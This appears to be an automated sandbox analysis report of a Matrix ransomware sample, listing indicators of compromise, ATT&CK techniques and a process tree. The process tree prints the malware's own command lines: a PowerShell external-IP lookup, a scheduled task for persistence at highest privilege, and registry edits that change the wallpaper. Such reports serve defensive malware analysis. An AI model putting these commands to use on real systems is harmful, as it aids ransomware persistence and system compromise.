File opened (read-only)	\??\U:	vzDEJ12q64.exe
File opened (read-only)	\??\A:	vzDEJ12q64.exe
File opened (read-only)	\??\K:	vzDEJ12q64.exe
File opened (read-only)	\??\N:	vzDEJ12q64.exe
File opened (read-only)	\??\Q:	vzDEJ12q64.exe
File opened (read-only)	\??\X:	vzDEJ12q64.exe
File opened (read-only)	\??\Z:	vzDEJ12q64.exe
File opened (read-only)	\??\Z:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Y:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\E:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\B:	vzDEJ12q64.exe
File opened (read-only)	\??\G:	vzDEJ12q64.exe
File opened (read-only)	\??\O:	vzDEJ12q64.exe
File opened (read-only)	\??\V:	vzDEJ12q64.exe
File opened (read-only)	\??\P:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\K:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\I:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\J:	vzDEJ12q64.exe
File opened (read-only)	\??\S:	vzDEJ12q64.exe
File opened (read-only)	\??\Y:	vzDEJ12q64.exe
File opened (read-only)	\??\L:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\G:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\L:	vzDEJ12q64.exe
File opened (read-only)	\??\T:	vzDEJ12q64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 myexternalip.com

flow	ioc
6	myexternalip.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\uY4fVpQ8.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_OFF.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14533_.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB2B.BDR	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115863.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\107.accdt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMASTHD.DPV	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\skin.dtd	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0304933.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\STORYBB.POC	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51F.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14514_.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00173_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsMacroTemplate.html	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Elemental.eftx	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN020.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ORIG98.POC	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02439_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\COPYING.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Mozilla Firefox\fonts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ProjectStatusReport.potx	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZMAIN.ACCDE	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RESUME.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2628 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2880 vssadmin.exe
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_Classes\Local Settings rundll32.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exevzDEJ12q64.exepowershell.exe

pid process

2028 powershell.exe
2588 vzDEJ12q64.exe
2588 vzDEJ12q64.exe
2588 vzDEJ12q64.exe
3844 powershell.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

vzDEJ12q64.exe

pid process

2588 vzDEJ12q64.exe

pid	process
2628	schtasks.exe

pid	process
2880	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000_Classes\Local Settings	rundll32.exe

pid	process
2028	powershell.exe
2588	vzDEJ12q64.exe
2588	vzDEJ12q64.exe
2588	vzDEJ12q64.exe
3844	powershell.exe

pid	process
2588	vzDEJ12q64.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

powershell.exevzDEJ12q64.exevssvc.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2588	vzDEJ12q64.exe
Token: SeLoadDriverPrivilege	2588	vzDEJ12q64.exe
Token: SeBackupPrivilege	896	vssvc.exe
Token: SeRestorePrivilege	896	vssvc.exe
Token: SeAuditPrivilege	896	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3460	WMIC.exe
Token: SeSecurityPrivilege	3460	WMIC.exe
Token: SeTakeOwnershipPrivilege	3460	WMIC.exe
Token: SeLoadDriverPrivilege	3460	WMIC.exe
Token: SeSystemProfilePrivilege	3460	WMIC.exe
Token: SeSystemtimePrivilege	3460	WMIC.exe
Token: SeProfSingleProcessPrivilege	3460	WMIC.exe
Token: SeIncBasePriorityPrivilege	3460	WMIC.exe
Token: SeCreatePagefilePrivilege	3460	WMIC.exe
Token: SeBackupPrivilege	3460	WMIC.exe
Token: SeRestorePrivilege	3460	WMIC.exe
Token: SeShutdownPrivilege	3460	WMIC.exe
Token: SeDebugPrivilege	3460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3460	WMIC.exe
Token: SeRemoteShutdownPrivilege	3460	WMIC.exe
Token: SeUndockPrivilege	3460	WMIC.exe
Token: SeManageVolumePrivilege	3460	WMIC.exe
Token: 33	3460	WMIC.exe
Token: 34	3460	WMIC.exe
Token: 35	3460	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3460	WMIC.exe
Token: SeSecurityPrivilege	3460	WMIC.exe
Token: SeTakeOwnershipPrivilege	3460	WMIC.exe
Token: SeLoadDriverPrivilege	3460	WMIC.exe
Token: SeSystemProfilePrivilege	3460	WMIC.exe
Token: SeSystemtimePrivilege	3460	WMIC.exe
Token: SeProfSingleProcessPrivilege	3460	WMIC.exe
Token: SeIncBasePriorityPrivilege	3460	WMIC.exe
Token: SeCreatePagefilePrivilege	3460	WMIC.exe
Token: SeBackupPrivilege	3460	WMIC.exe
Token: SeRestorePrivilege	3460	WMIC.exe
Token: SeShutdownPrivilege	3460	WMIC.exe
Token: SeDebugPrivilege	3460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3460	WMIC.exe
Token: SeRemoteShutdownPrivilege	3460	WMIC.exe
Token: SeUndockPrivilege	3460	WMIC.exe
Token: SeManageVolumePrivilege	3460	WMIC.exe
Token: 33	3460	WMIC.exe
Token: 34	3460	WMIC.exe
Token: 35	3460	WMIC.exe
Token: SeDebugPrivilege	3844	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.execmd.execmd.execmd.execmd.exewscript.execmd.exe

description	pid	process	target process
PID 3068 wrote to memory of 2452	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2452	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2452	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2452	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2920	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWxX9xnj.exe
PID 3068 wrote to memory of 2920	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWxX9xnj.exe
PID 3068 wrote to memory of 2920	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWxX9xnj.exe
PID 3068 wrote to memory of 2920	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWxX9xnj.exe
PID 3068 wrote to memory of 1472	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1472	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1472	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1472	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1472 wrote to memory of 2028	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 2028	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 2028	1472	cmd.exe	powershell.exe
PID 1472 wrote to memory of 2028	1472	cmd.exe	powershell.exe
PID 3068 wrote to memory of 2380	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2380	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2380	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 2380	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1532	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1532	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1532	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1532	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 2380 wrote to memory of 2072	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 2072	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 2072	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 2072	2380	cmd.exe	reg.exe
PID 1532 wrote to memory of 1176	1532	cmd.exe	wscript.exe
PID 1532 wrote to memory of 1176	1532	cmd.exe	wscript.exe
PID 1532 wrote to memory of 1176	1532	cmd.exe	wscript.exe
PID 1532 wrote to memory of 1176	1532	cmd.exe	wscript.exe
PID 2380 wrote to memory of 2428	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 2428	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 2428	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 2428	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 1144	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 1144	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 1144	2380	cmd.exe	reg.exe
PID 2380 wrote to memory of 1144	2380	cmd.exe	reg.exe
PID 3068 wrote to memory of 1576	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1576	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1576	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3068 wrote to memory of 1576	3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1576 wrote to memory of 336	1576	cmd.exe	attrib.exe
PID 1576 wrote to memory of 336	1576	cmd.exe	attrib.exe
PID 1576 wrote to memory of 336	1576	cmd.exe	attrib.exe
PID 1576 wrote to memory of 336	1576	cmd.exe	attrib.exe
PID 1576 wrote to memory of 3188	1576	cmd.exe	cacls.exe
PID 1576 wrote to memory of 3188	1576	cmd.exe	cacls.exe
PID 1576 wrote to memory of 3188	1576	cmd.exe	cacls.exe
PID 1576 wrote to memory of 3188	1576	cmd.exe	cacls.exe
PID 1176 wrote to memory of 3236	1176	wscript.exe	cmd.exe
PID 1176 wrote to memory of 3236	1176	wscript.exe	cmd.exe
PID 1176 wrote to memory of 3236	1176	wscript.exe	cmd.exe
PID 1176 wrote to memory of 3236	1176	wscript.exe	cmd.exe
PID 3236 wrote to memory of 2628	3236	cmd.exe	schtasks.exe
PID 3236 wrote to memory of 2628	3236	cmd.exe	schtasks.exe
PID 3236 wrote to memory of 2628	3236	cmd.exe	schtasks.exe
PID 3236 wrote to memory of 2628	3236	cmd.exe	schtasks.exe
PID 1576 wrote to memory of 1340	1576	cmd.exe	takeown.exe
PID 1576 wrote to memory of 1340	1576	cmd.exe	takeown.exe
PID 1576 wrote to memory of 1340	1576	cmd.exe	takeown.exe
PID 1576 wrote to memory of 1340	1576	cmd.exe	takeown.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

336 attrib.exe

pid	process
336	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
"C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe"
  2⤵
  PID:2452
- C:\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe
  "C:\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2920
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\re2N8DNf.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ww8VhNEd.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1532
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\ww8VhNEd.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fEge4Ip6.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3236
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fEge4Ip6.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:2628
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1564
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:3344
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\uY4fVpQ8.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\SysWOW64\reg.exe
